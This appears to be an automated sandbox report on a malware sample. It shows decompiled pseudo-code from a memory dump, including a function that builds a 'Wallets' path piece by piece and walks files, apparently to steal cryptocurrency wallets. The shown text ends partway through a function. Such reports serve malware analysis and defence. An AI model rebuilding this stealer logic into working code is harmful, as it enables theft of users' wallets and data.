                                                                    					_push(__ebx);
                                                                    					_push(__esi);
                                                                    					_push(__edi);
                                                                    					_t45 = "PATH";
                                                                    					GetEnvironmentVariableA(_t45, 0x446f38, 0xffff);
                                                                    					E00426300( &_v5008, 0, 0x1388);
                                                                    					lstrcatA( &_v5008, 0x446f38);
                                                                    					lstrcatA( &_v5008, ";");
                                                                    					lstrcatA( &_v5008, _v5012);
                                                                    					SetEnvironmentVariableA(_t45,  &_v5008);
                                                                    					E00426300( &_v5008, 0, 0x1388);
                                                                    					_t31 = LoadLibraryA( *0x4460bc);
                                                                    					 *0x446240 = _t31;
                                                                    					if(_t31 != 0) {
                                                                    						 *0x446234 = GetProcAddress(_t31,  *0x445cb0);
                                                                    						 *0x446254 = GetProcAddress( *0x446240,  *0x446030);
                                                                    						 *0x446200 = GetProcAddress( *0x446240,  *0x445bd8);
                                                                    						 *0x446228 = GetProcAddress( *0x446240,  *0x445b24);
                                                                    						 *0x446244 = GetProcAddress( *0x446240,  *0x4461b8);
                                                                    						 *0x446220 = GetProcAddress( *0x446240,  *0x445d48);
                                                                    					}
                                                                    					_t55 =  *0x446234; // 0x0
                                                                    					if(_t55 == 0) {
                                                                    						L10:
                                                                    						_t16 = 0;
                                                                    					} else {
                                                                    						_t56 =  *0x446254; // 0x0
                                                                    						if(_t56 == 0) {
                                                                    							goto L10;
                                                                    						} else {
                                                                    							_t57 =  *0x446200; // 0x0
                                                                    							if(_t57 == 0) {
                                                                    								goto L10;
                                                                    							} else {
                                                                    								_t58 =  *0x446244; // 0x0
                                                                    								if(_t58 == 0) {
                                                                    									goto L10;
                                                                    								} else {
                                                                    									_t59 =  *0x446220; // 0x0
                                                                    									if(_t59 == 0) {
                                                                    										goto L10;
                                                                    									} else {
                                                                    										_t60 =  *0x446228; // 0x0
                                                                    										if(_t60 == 0) {
                                                                    											goto L10;
                                                                    										} else {
                                                                    											_t16 = 1;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_pop(_t44);
                                                                    					_pop(_t46);
                                                                    					_pop(_t39);
                                                                    				}
                                                                    				return E0041DA9B(_t16, _t39, _v8 ^ _t49, _t43, _t44, _t46);
                                                                    			}




















                                                                    APIs
                                                                    • GetEnvironmentVariableA.KERNEL32(PATH,00446F38,0000FFFF,04C98480,00000104,?,?,004132A6,?,?,?,?,?,?), ref: 00413000
                                                                    • _memset.LIBCMT ref: 00413015
                                                                    • lstrcatA.KERNEL32(?,00446F38,?,?,?,?,?,?,?,?,?), ref: 00413025
                                                                    • lstrcatA.KERNEL32(?,0043EAA0,?,?,?,?,?,?,?,?,?), ref: 00413037
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041304A
                                                                    • SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,?,?,?,?,?), ref: 00413058
                                                                    • _memset.LIBCMT ref: 00413069
                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413077
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00413091
                                                                    • GetProcAddress.KERNEL32 ref: 004130A8
                                                                    • GetProcAddress.KERNEL32 ref: 004130BF
                                                                    • GetProcAddress.KERNEL32 ref: 004130D6
                                                                    • GetProcAddress.KERNEL32 ref: 004130ED
                                                                    • GetProcAddress.KERNEL32 ref: 00413104
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
                                                                    • String ID: PATH
                                                                    • API String ID: 3772005587-1036084923
                                                                    • Opcode ID: 9df7bf8e8ec9dd19cbb5c4378077d5e82aab42e83cfde72de5ef2daa61efcc62
                                                                    • Instruction ID: 748926a35c7f1f89fcb44e6c6686cef8338ece62dccfaa37fe4aba263accd245
                                                                    • Opcode Fuzzy Hash: 9df7bf8e8ec9dd19cbb5c4378077d5e82aab42e83cfde72de5ef2daa61efcc62
                                                                    • Instruction Fuzzy Hash: 9D415D79901214FFDB11AF64FC4989ABBB9FB0BB0270244B6F90592231DB754A84DF1E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 25%
                                                                    			E004085DE(void* __ebx, void* __eflags, CHAR* _a4) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				char _v16;
                                                                    				CHAR* __edi;
                                                                    				short _t17;
                                                                    				void* _t20;
                                                                    				signed int _t21;
                                                                    				void* _t24;
                                                                    				void* _t28;
                                                                    				void* _t29;
                                                                    				void* _t33;
                                                                    				void* _t34;
                                                                    
                                                                    				lstrcatA(HeapAlloc(GetProcessHeap(), 0, 0xea60), _a4);
                                                                    				_t17 = 0x2c;
                                                                    				_v8 = _t17;
                                                                    				_t20 = E0041E87C(__ebx, _t28, _t29, _t15,  &_v8,  &_v16);
                                                                    				_t30 = _t20;
                                                                    				_t34 = _t33 + 0xc;
                                                                    				if(_t20 == 0) {
                                                                    					return _t20;
                                                                    				} else {
                                                                    					_v12 = _v12 & 0x00000000;
                                                                    					_push(__ebx);
                                                                    					while(1) {
                                                                    						_t21 = _v12;
                                                                    						if(_t21 > 0xb) {
                                                                    							goto L22;
                                                                    						}
                                                                    						switch( *((intOrPtr*)(_t21 * 4 +  &M0040875A))) {
                                                                    							case 0:
                                                                    								 *0x4442d8 = 1;
                                                                    								goto L22;
                                                                    							case 1:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465e4 = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 2:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465e5 = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 3:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465e6 = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 4:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465ec = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 5:
                                                                    								__eax = GetProcessHeap();
                                                                    								__eax = HeapAlloc(__eax, 0, __ebx);
                                                                    								 *0x4461e8 = __eax;
                                                                    								goto L21;
                                                                    							case 6:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465e9 = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 7:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465ea = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 8:
                                                                    								_push(__esi);
                                                                    								_push(__edi);
                                                                    								if( *0x446458() == 0) {
                                                                    									 *0x4465eb = 1;
                                                                    								}
                                                                    								goto L22;
                                                                    							case 9:
                                                                    								goto L22;
                                                                    							case 0xa:
                                                                    								__eax = GetProcessHeap();
                                                                    								__eax = HeapAlloc(__eax, 0, __ebx);
                                                                    								 *0x4461e0 = __eax;
                                                                    								L21:
                                                                    								__eax = lstrcatA(__eax, __edi);
                                                                    								goto L22;
                                                                    						}
                                                                    						L22:
                                                                    						_t24 = E0041E87C(0xf423f, _t28, _t30, 0,  &_v8,  &_v16);
                                                                    						_t34 = _t34 + 0xc;
                                                                    						_v12 = _v12 + 1;
                                                                    						_t30 = _t24;
                                                                    						if(_t24 == 0) {
                                                                    							return _t24;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}
















                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 004085ED
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004085F4
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 00408600
                                                                    • _strtok_s.LIBCMT ref: 00408616
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408658
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408674
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408690
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086AC
                                                                    • GetProcessHeap.KERNEL32(00000000), ref: 004086C5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004086CC
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086DB
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086F0
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408705
                                                                    • GetProcessHeap.KERNEL32(00000000), ref: 0040871B
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408722
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040872F
                                                                    • _strtok_s.LIBCMT ref: 0040873F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$_strtok_slstrcat
                                                                    • String ID:
                                                                    • API String ID: 4140380964-0
                                                                    • Opcode ID: 9fe15ea3cd8cb55b69d4353edd269bc31d074beb1793045d57e231c3bfcf8b4b
                                                                    • Instruction ID: 1ab5c5e10588874a8b03f28668edbbbb0e50cbb0f25720013d80549cebb40681
                                                                    • Opcode Fuzzy Hash: 9fe15ea3cd8cb55b69d4353edd269bc31d074beb1793045d57e231c3bfcf8b4b
                                                                    • Instruction Fuzzy Hash: FE41BD38504240AAEB019B61AD8CFAB3F7C9B17795F21003AF541A7295FF788582972F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E0040C423(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t148;
                                                                    				intOrPtr _t152;
                                                                    				void* _t166;
                                                                    				void* _t171;
                                                                    				void* _t178;
                                                                    				void* _t183;
                                                                    				WCHAR* _t184;
                                                                    				signed char _t185;
                                                                    				CHAR* _t210;
                                                                    				CHAR* _t217;
                                                                    				intOrPtr* _t228;
                                                                    				void* _t230;
                                                                    				void* _t241;
                                                                    				intOrPtr _t262;
                                                                    				void* _t284;
                                                                    				void* _t322;
                                                                    				void* _t323;
                                                                    				intOrPtr _t324;
                                                                    				void* _t325;
                                                                    
                                                                    				_t312 = __esi;
                                                                    				_t298 = __edi;
                                                                    				_t252 = __ebx;
                                                                    				_push(0x260);
                                                                    				E0042083E(E00434A31, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t322 - 0x258)) =  *((intOrPtr*)(_t322 + 8));
                                                                    				 *((intOrPtr*)(_t322 - 4)) = 0;
                                                                    				 *((intOrPtr*)(_t322 - 0x120)) = 0xf;
                                                                    				 *((intOrPtr*)(_t322 - 0x124)) = 0;
                                                                    				 *((char*)(_t322 - 0x134)) = 0;
                                                                    				 *((char*)(_t322 - 4)) = 3;
                                                                    				_t327 =  *((intOrPtr*)(_t322 + 0xc));
                                                                    				if( *((intOrPtr*)(_t322 + 0xc)) == 0) {
                                                                    					_push(0x1a);
                                                                    				} else {
                                                                    					_push(0x1c);
                                                                    				}
                                                                    				E00404331(_t322 - 0x134, E00416617(_t252, _t298, _t312));
                                                                    				_push(_t322 - 0x134);
                                                                    				_push(_t322 - 0x1dc);
                                                                    				_t299 = _t322 + 0x10;
                                                                    				_t148 = E0040C1B7(_t252, _t322 + 0x10, _t312, _t327);
                                                                    				_t324 = _t323 - 0x14;
                                                                    				 *((char*)(_t322 - 4)) = 4;
                                                                    				_t297 = _t322 + 0x48;
                                                                    				 *((intOrPtr*)(_t322 - 0x25c)) = _t324;
                                                                    				E0040D66C(_t148, _t148, _t324, _t322 + 0x48);
                                                                    				E004162AB(_t322 - 0x26c, _t322 + 0x10, _t312, _t327);
                                                                    				 *((char*)(_t322 - 4)) = 6;
                                                                    				E00404354(_t322 - 0x1dc, 1, 0);
                                                                    				_t152 =  *((intOrPtr*)(_t322 - 0x268));
                                                                    				_t262 =  *((intOrPtr*)(_t322 - 0x26c));
                                                                    				 *((intOrPtr*)(_t322 - 0x25c)) = _t152;
                                                                    				 *((intOrPtr*)(_t322 - 0x254)) = _t262;
                                                                    				_t328 = _t262 - _t152;
                                                                    				if(_t262 != _t152) {
                                                                    					do {
                                                                    						E0040D38B(_t322 - 0x16c,  *((intOrPtr*)(_t322 - 0x254)));
                                                                    						 *((char*)(_t322 - 4)) = 7;
                                                                    						_t166 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x230);
                                                                    						_push(_t322 - 0x134);
                                                                    						_push(_t322 - 0x214);
                                                                    						 *((char*)(_t322 - 4)) = 8;
                                                                    						E0040C1B7(0, _t322 + 0x10, _t166, _t328);
                                                                    						 *((char*)(_t322 - 4)) = 9;
                                                                    						_t171 = E004046CE(_t166, _t322 - 0x24c);
                                                                    						 *((char*)(_t322 - 4)) = 0xa;
                                                                    						 *((intOrPtr*)(_t322 - 0x1ac)) = 0xf;
                                                                    						 *((intOrPtr*)(_t322 - 0x1b0)) = 0;
                                                                    						 *((char*)(_t322 - 0x1c0)) = 0;
                                                                    						E004042ED(_t322 - 0x1c0, _t171);
                                                                    						E00404354(_t322 - 0x24c, 1, 0);
                                                                    						E00404354(_t322 - 0x214, 1, 0);
                                                                    						 *((char*)(_t322 - 4)) = 0xe;
                                                                    						E00404354(_t322 - 0x230, 1, 0);
                                                                    						_t178 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x150);
                                                                    						_push(_t322 - 0x134);
                                                                    						_push(_t322 - 0x1a4);
                                                                    						 *((char*)(_t322 - 4)) = 0xf;
                                                                    						E0040C1B7(0, _t322 + 0x10, _t178, _t328);
                                                                    						 *((char*)(_t322 - 4)) = 0x10;
                                                                    						_t183 = E004046CE(_t178, _t322 - 0x188);
                                                                    						 *((char*)(_t322 - 4)) = 0x11;
                                                                    						_t184 = E004160E8(_t183, _t322 - 0x1f8);
                                                                    						if(_t184[0xa] >= 8) {
                                                                    							_t184 =  *_t184;
                                                                    						}
                                                                    						_t185 = GetFileAttributesW(_t184);
                                                                    						if(_t185 == 0xffffffff) {
                                                                    							L8:
                                                                    							 *((intOrPtr*)(_t322 - 0x250)) = 0;
                                                                    						} else {
                                                                    							 *((intOrPtr*)(_t322 - 0x250)) = 1;
                                                                    							if((_t185 & 0x00000010) != 0) {
                                                                    								goto L8;
                                                                    							}
                                                                    						}
                                                                    						E0040C148(0, _t322 - 0x1f8, 1);
                                                                    						E00404354(_t322 - 0x188, 1, 0);
                                                                    						E00404354(_t322 - 0x1a4, 1, 0);
                                                                    						 *((char*)(_t322 - 4)) = 0xe;
                                                                    						E00404354(_t322 - 0x150, 1, 0);
                                                                    						if( *((intOrPtr*)(_t322 - 0x250)) != 0) {
                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x1c)) + 1;
                                                                    						}
                                                                    						E00426300(_t322 - 0x118, 0, 0x104);
                                                                    						_t325 = _t324 + 0xc;
                                                                    						lstrcatA(_t322 - 0x118, 0x43c8e0);
                                                                    						lstrcatA(_t322 - 0x118, "W");
                                                                    						lstrcatA(_t322 - 0x118, "a");
                                                                    						lstrcatA(_t322 - 0x118, "l");
                                                                    						lstrcatA(_t322 - 0x118, "l");
                                                                    						lstrcatA(_t322 - 0x118, "e");
                                                                    						lstrcatA(_t322 - 0x118, "t");
                                                                    						lstrcatA(_t322 - 0x118, "s");
                                                                    						lstrcatA(_t322 - 0x118, 0x43c8e0);
                                                                    						_t210 =  *(_t322 + 0x2c);
                                                                    						if( *((intOrPtr*)(_t322 + 0x40)) < 0x10) {
                                                                    							_t210 = _t322 + 0x2c;
                                                                    						}
                                                                    						lstrcatA(_t322 - 0x118, _t210);
                                                                    						lstrcatA(_t322 - 0x118, 0x43c8e0);
                                                                    						_t217 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x150);
                                                                    						 *((char*)(_t322 - 4)) = 0x12;
                                                                    						_t335 = _t217[0x14] - 0x10;
                                                                    						if(_t217[0x14] >= 0x10) {
                                                                    							_t217 =  *_t217;
                                                                    						}
                                                                    						lstrcatA(_t322 - 0x118, _t217);
                                                                    						 *((char*)(_t322 - 4)) = 0xe;
                                                                    						E00404354(_t322 - 0x150, 1, 0);
                                                                    						 *((intOrPtr*)(_t322 - 0x250)) = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x188);
                                                                    						_push(_t322 - 0x134);
                                                                    						_push(_t322 - 0x1a4);
                                                                    						 *((char*)(_t322 - 4)) = 0x13;
                                                                    						_t284 = E0040C1B7(0, _t322 + 0x10, 1, _t335);
                                                                    						 *((char*)(_t322 - 4)) = 0x14;
                                                                    						_t228 = E004046CE( *((intOrPtr*)(_t322 - 0x250)), _t322 - 0x150);
                                                                    						 *((char*)(_t322 - 4)) = 0x15;
                                                                    						_t336 =  *((intOrPtr*)(_t228 + 0x14)) - 0x10;
                                                                    						if( *((intOrPtr*)(_t228 + 0x14)) >= 0x10) {
                                                                    							_t228 =  *_t228;
                                                                    						}
                                                                    						_t230 = E00426ED0(E00416388(_t284, _t228), _t297, 0x3e8, 0);
                                                                    						E00404354(_t322 - 0x150, 1, 0);
                                                                    						E00404354(_t322 - 0x1a4, 1, 0);
                                                                    						 *((char*)(_t322 - 4)) = 0xe;
                                                                    						E00404354(_t322 - 0x188, 1, 0);
                                                                    						 *0x4461f8 =  *0x4461f8 + _t230;
                                                                    						 *((intOrPtr*)(_t322 - 0x250)) = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x188);
                                                                    						_push(_t322 - 0x134);
                                                                    						_push(_t322 - 0x1a4);
                                                                    						 *((char*)(_t322 - 4)) = 0x16;
                                                                    						E0040C1B7(0, _t322 + 0x10, 1, _t336);
                                                                    						 *((char*)(_t322 - 4)) = 0x17;
                                                                    						_t241 = E004046CE( *((intOrPtr*)(_t322 - 0x250)), _t322 - 0x150);
                                                                    						 *((char*)(_t322 - 4)) = 0x18;
                                                                    						if( *((intOrPtr*)(_t241 + 0x14)) < 0x10) {
                                                                    						}
                                                                    						_t297 = _t322 - 0x118;
                                                                    						E0041CE7C( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x20)), _t322 - 0x118, 0, 2);
                                                                    						_t324 = _t325 + 0xc;
                                                                    						E00404354(_t322 - 0x150, 1, 0);
                                                                    						E00404354(_t322 - 0x1a4, 1, 0);
                                                                    						E00404354(_t322 - 0x188, 1, 0);
                                                                    						E00404354(_t322 - 0x1c0, 1, 0);
                                                                    						_t299 = 0;
                                                                    						 *((char*)(_t322 - 4)) = 6;
                                                                    						E0040C148(0, _t322 - 0x16c, 1);
                                                                    						 *((intOrPtr*)(_t322 - 0x254)) =  *((intOrPtr*)(_t322 - 0x254)) + 0x1c;
                                                                    					} while ( *((intOrPtr*)(_t322 - 0x254)) !=  *((intOrPtr*)(_t322 - 0x25c)));
                                                                    				}
                                                                    				_t153 =  *((intOrPtr*)(_t322 - 0x26c));
                                                                    				if( *((intOrPtr*)(_t322 - 0x26c)) != 0) {
                                                                    					E0040D51F(_t153,  *((intOrPtr*)(_t322 - 0x268)));
                                                                    					_push( *((intOrPtr*)(_t322 - 0x26c)));
                                                                    					E0041E1F1();
                                                                    				}
                                                                    				 *((intOrPtr*)(_t322 - 0x26c)) = 0;
                                                                    				 *((intOrPtr*)(_t322 - 0x268)) = 0;
                                                                    				 *((intOrPtr*)(_t322 - 0x264)) = 0;
                                                                    				E00404354(_t322 - 0x134, 1, 0);
                                                                    				E00404354(_t322 + 0x10, 1, 0);
                                                                    				E00404354(_t322 + 0x2c, 1, 0);
                                                                    				E00404354(_t322 + 0x48, 1, 0);
                                                                    				return E00420888(0, _t299, 1);
                                                                    			}

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040C42D
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0040888C,?,?,?), ref: 00416109
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0040888C,?,?,?), ref: 0041613A
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040C5F2
                                                                    • _memset.LIBCMT ref: 0040C66C
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000001,00000000,?,00000260,0040CBE9,?,00000000), ref: 0040C681
                                                                    • lstrcatA.KERNEL32(?,0043EE50,?,00000260,0040CBE9,?,00000000), ref: 0040C693
                                                                    • lstrcatA.KERNEL32(?,0043EE54,?,00000260,0040CBE9,?,00000000), ref: 0040C6A5
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,00000260,0040CBE9,?,00000000), ref: 0040C6B7
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,00000260,0040CBE9,?,00000000), ref: 0040C6C9
                                                                    • lstrcatA.KERNEL32(?,0043EE5C,?,00000260,0040CBE9,?,00000000), ref: 0040C6DB
                                                                    • lstrcatA.KERNEL32(?,0043EE60,?,00000260,0040CBE9,?,00000000), ref: 0040C6ED
                                                                    • lstrcatA.KERNEL32(?,0043EE64,?,00000260,0040CBE9,?,00000000), ref: 0040C6FF
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000260,0040CBE9,?,00000000), ref: 0040C70D
                                                                    • lstrcatA.KERNEL32(?,?,?,00000260,0040CBE9,?,00000000), ref: 0040C727
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000260,0040CBE9,?,00000000), ref: 0040C735
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000260,0040CBE9,?,00000000), ref: 0040C761
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 0041607C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,0000000F,00000000,?,?,?,00410FD2,?), ref: 0041609F
                                                                      • Part of subcall function 0041607C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00410FD2,?,?,?), ref: 004160C4
                                                                      • Part of subcall function 0040C1B7: __EH_prolog3.LIBCMT ref: 0040C1BE
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C7DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$ByteCharMultiWide$AttributesFileH_prolog3H_prolog3_Unothrow_t@std@@@__ehfuncinfo$??2@_memmove_memset
                                                                    • String ID:
                                                                    • API String ID: 3439367336-0
                                                                    • Opcode ID: 0274dfba1bf51bd1badf710d2c8fda07160a0912f2fa417b9bfd3ab15c42fd7b
                                                                    • Instruction ID: 24416d1cd17568d800239b90898ace65257112f9d78cb955b0f0f831f8b3c306
                                                                    • Opcode Fuzzy Hash: 0274dfba1bf51bd1badf710d2c8fda07160a0912f2fa417b9bfd3ab15c42fd7b
                                                                    • Instruction Fuzzy Hash: E6E16CB2901258EFDB14EB64CC85BDEB778AF49304F1041EAE509B7181DA749F88CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E0041067C(char __ebx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                    				char* _t149;
                                                                    				CHAR* _t150;
                                                                    				signed char _t156;
                                                                    				intOrPtr _t161;
                                                                    				intOrPtr* _t168;
                                                                    				void* _t183;
                                                                    				void* _t185;
                                                                    				void* _t187;
                                                                    				intOrPtr _t189;
                                                                    				intOrPtr* _t198;
                                                                    				void* _t209;
                                                                    				void* _t213;
                                                                    				CHAR* _t214;
                                                                    				CHAR* _t220;
                                                                    				CHAR* _t224;
                                                                    				void* _t239;
                                                                    				void* _t271;
                                                                    				intOrPtr _t300;
                                                                    				intOrPtr _t301;
                                                                    				intOrPtr _t303;
                                                                    				intOrPtr _t304;
                                                                    				intOrPtr _t306;
                                                                    				intOrPtr _t307;
                                                                    				intOrPtr _t309;
                                                                    				intOrPtr _t310;
                                                                    				void* _t312;
                                                                    				void* _t313;
                                                                    				void* _t314;
                                                                    				void* _t315;
                                                                    				CHAR* _t319;
                                                                    				intOrPtr _t323;
                                                                    				void* _t335;
                                                                    				intOrPtr _t336;
                                                                    				intOrPtr _t365;
                                                                    
                                                                    				_t322 = __esi;
                                                                    				_t319 = __edi;
                                                                    				_t266 = __ebx;
                                                                    				_push(0x2b4);
                                                                    				E0042083E(E00434493, __ebx, __edi, __esi);
                                                                    				_t271 = 0x104;
                                                                    				_t149 = _t335 - 0x118;
                                                                    				do {
                                                                    					 *_t149 = 0;
                                                                    					_t149 = _t149 + 1;
                                                                    					_t271 = _t271 - 1;
                                                                    				} while (_t271 != 0);
                                                                    				_t150 = E00416617(__ebx, __edi, __esi, 0x28);
                                                                    				lstrcatA(_t335 - 0x118, _t150);
                                                                    				lstrcatA(_t335 - 0x118,  *0x445b94);
                                                                    				_t156 = GetFileAttributesA(_t335 - 0x118);
                                                                    				if(_t156 == 0xffffffff) {
                                                                    					L44:
                                                                    					return E00420888(_t266, _t319, _t322);
                                                                    				}
                                                                    				_t340 = _t156 & 0x00000010;
                                                                    				if((_t156 & 0x00000010) != 0) {
                                                                    					goto L44;
                                                                    				}
                                                                    				_push(_t335 - 0x118);
                                                                    				_push(_t335 - 0x2c0);
                                                                    				E00413B48(__ebx, __edi, __esi, _t340);
                                                                    				_t266 = 0;
                                                                    				 *(_t335 - 4) = 0;
                                                                    				_t161 = 0xf;
                                                                    				 *((intOrPtr*)(_t335 - 0x120)) = _t161;
                                                                    				 *((intOrPtr*)(_t335 - 0x124)) = 0;
                                                                    				 *((char*)(_t335 - 0x134)) = 0;
                                                                    				_t323 = 0;
                                                                    				 *((intOrPtr*)(_t335 - 0x190)) = _t161;
                                                                    				 *((intOrPtr*)(_t335 - 0x194)) = 0;
                                                                    				 *(_t335 - 0x1a4) = 0;
                                                                    				 *((intOrPtr*)(_t335 - 0x174)) = _t161;
                                                                    				 *((intOrPtr*)(_t335 - 0x178)) = 0;
                                                                    				 *(_t335 - 0x188) = 0;
                                                                    				 *((intOrPtr*)(_t335 - 0x158)) = _t161;
                                                                    				 *((intOrPtr*)(_t335 - 0x15c)) = 0;
                                                                    				 *(_t335 - 0x16c) = 0;
                                                                    				 *((intOrPtr*)(_t335 - 0x13c)) = _t161;
                                                                    				 *((intOrPtr*)(_t335 - 0x140)) = 0;
                                                                    				 *(_t335 - 0x150) = 0;
                                                                    				 *(_t335 - 4) = 5;
                                                                    				_push(0xa);
                                                                    				_push(_t335 +  *((intOrPtr*)( *((intOrPtr*)(_t335 - 0x2c0)) + 4)) - 0x2c0);
                                                                    				_push(E00414754(0, _t272, __edi, 0, _t340) & 0x000000ff);
                                                                    				_push(_t335 - 0x2c0);
                                                                    				_t168 = E00414B0D(0, _t335 - 0x134, __edi, 0, _t340);
                                                                    				_t278 =  *((intOrPtr*)( *_t168 + 4)) + _t168;
                                                                    				asm("sbb eax, eax");
                                                                    				if(( *((intOrPtr*)( *_t168 + 4)) + _t168 &  !( ~( *( *((intOrPtr*)( *_t168 + 4)) + _t168 + 0xc) & 0x00000006))) == 0) {
                                                                    					L43:
                                                                    					_t322 = 1;
                                                                    					E00404354(_t335 - 0x150, 1, _t266);
                                                                    					E00404354(_t335 - 0x16c, 1, _t266);
                                                                    					E00404354(_t335 - 0x188, 1, _t266);
                                                                    					E00404354(_t335 - 0x1a4, 1, _t266);
                                                                    					E00404354(_t335 - 0x134, 1, _t266);
                                                                    					 *(_t335 - 4) =  *(_t335 - 4) | 0xffffffff;
                                                                    					E00413BE2(_t335 - 0x258, 1,  *(_t335 - 4));
                                                                    					 *((intOrPtr*)(_t335 - 0x258)) = 0x43f2fc;
                                                                    					E0041D1C9(_t335 - 0x258);
                                                                    					goto L44;
                                                                    				}
                                                                    				while(1) {
                                                                    					_t183 = E0040C00F(_t335 - 0x134,  *0x445b00, _t323 + 1);
                                                                    					_t326 = _t183;
                                                                    					_t319 = _t319 | 0xffffffff;
                                                                    					if(_t183 != _t319) {
                                                                    						E0040453E(_t335 - 0x134, _t266, 9);
                                                                    						_t309 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t309 = _t335 - 0x134;
                                                                    						}
                                                                    						_t259 =  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t315 = _t309 +  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t310 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t310 = _t335 - 0x134;
                                                                    						}
                                                                    						E00413770(_t335 - 0x134, _t335 - 0x204, _t259 + _t310 + 0xfffffff9, _t315);
